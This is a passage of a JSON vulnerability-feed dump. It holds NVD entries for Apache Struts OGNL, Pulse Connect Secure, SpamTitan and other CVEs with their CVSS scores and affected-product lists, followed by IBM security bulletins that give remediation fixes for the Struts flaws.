"version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "type": "cve", "title": "CVE-2020-11738", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2022-10-05T16:54:00", "cpe": [], "id": "CVE-2020-11738", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T15:03:37", "description": "A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T13:15:00", "type": "cve", "title": "CVE-2020-8260", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2021-09-21T17:04:00", "cpe": ["cpe:/a:pulsesecure:pulse_secure_desktop_client:9.1"], "id": "CVE-2020-8260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8260", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r6:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:-:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r5:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r2:*:*:*:linux:*:*"]}, {"lastseen": "2023-06-06T14:31:22", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. 
Affected software : Apache Struts 2.0.0 - Struts 2.5.25.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T02:15:00", "type": "cve", "title": "CVE-2020-17530", "cwe": ["CWE-917"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-03T16:38:00", "cpe": ["cpe:/a:oracle:communications_diameter_intelligence_hub:8.1.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.2.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.0.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.6", "cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.23", "cpe:/a:oracle:communications_policy_management:12.5.0", "cpe:/a:oracle:hospitality_opera_5:5.6", "cpe:/a:oracle:business_intelligence:12.2.1.4.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.3", "cpe:/a:oracle:communications_pricing_design_center:12.0.0.3.0", "cpe:/a:oracle:communications_diameter_intelligence_hub:8.2.3"], "id": "CVE-2020-17530", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17530", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:hospitality_opera_5:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:communications_diameter_intelligence_hub:8.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:16:47", "description": "An issue was discovered in Titan SpamTitan 7.07. 
Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-17T17:15:00", "type": "cve", "title": "CVE-2020-11698", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2022-04-28T18:33:00", "cpe": ["cpe:/a:titanhq:spamtitan:7.07"], "id": "CVE-2020-11698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:titanhq:spamtitan:7.07:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:20:44", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T17:15:00", "type": "cve", "title": "CVE-2019-0230", "cwe": ["CWE-1321"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T19:47:00", "cpe": ["cpe:/a:oracle:financial_services_data_integration_hub:8.0.6", "cpe:/a:oracle:financial_services_market_risk_measurement_and_management:8.0.6", "cpe:/a:apache:struts:2.5.20", "cpe:/a:oracle:communications_policy_management:12.5.0", "cpe:/a:oracle:financial_services_data_integration_hub:8.0.3", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.23"], "id": "CVE-2019-0230", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:43:21", "description": "The fix issued for CVE-2020-17530 was incomplete. 
So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T16:15:00", "type": "cve", "title": "CVE-2021-31805", "cwe": ["CWE-917"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T18:15:00", "cpe": ["cpe:/a:apache:struts:2.5.29"], "id": "CVE-2021-31805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.5.29:*:*:*:*:*:*:*"]}], "ibm": [{"lastseen": "2023-07-12T09:36:43", "description": "## Summary\n\nMultiple vulnerabilities in Apache Struts 2.3.x may affect IBM eDiscovery Manager. 
These are addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \neDiscovery Manager| 2.2.2 \n \n## Remediation/Fixes\n\nProduct\n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF008&source=SAR> \"Interim Fix 008\" ) for Windows\n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 008](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF008&source=SAR> \"Interim Fix 008\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T10:00:46", "type": "ibm", "title": "Security Bulletin: Multiple 
Vulnerabilities in Apache Struts Affect IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-07-12T10:00:46", "id": "80737D4B4CE626670083B16CA387FEFAC8045ECB16DACD55AD56FFAC544F21A4", "href": "https://www.ibm.com/support/pages/node/7011373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:50:13", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerability\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \nIBM Sterling Order Management| 9.4.x \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2020-17530"], "modified": "2022-05-11T01:06:34", "id": "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "href": "https://www.ibm.com/support/pages/node/6565855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for IBM Connections| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:03:35", "type": "ibm", "title": "Security Bulletin: 
CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:03:35", "id": "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "href": "https://www.ibm.com/support/pages/node/6593791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:23", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T07:30:44", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may 
affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T07:30:44", "id": "D7F5135F5917DEC79A3EC5F40696F566955841FB3632FC8C822946EC528790B3", "href": "https://www.ibm.com/support/pages/node/6593761", "cvss": {"score": 7.5, "vector": 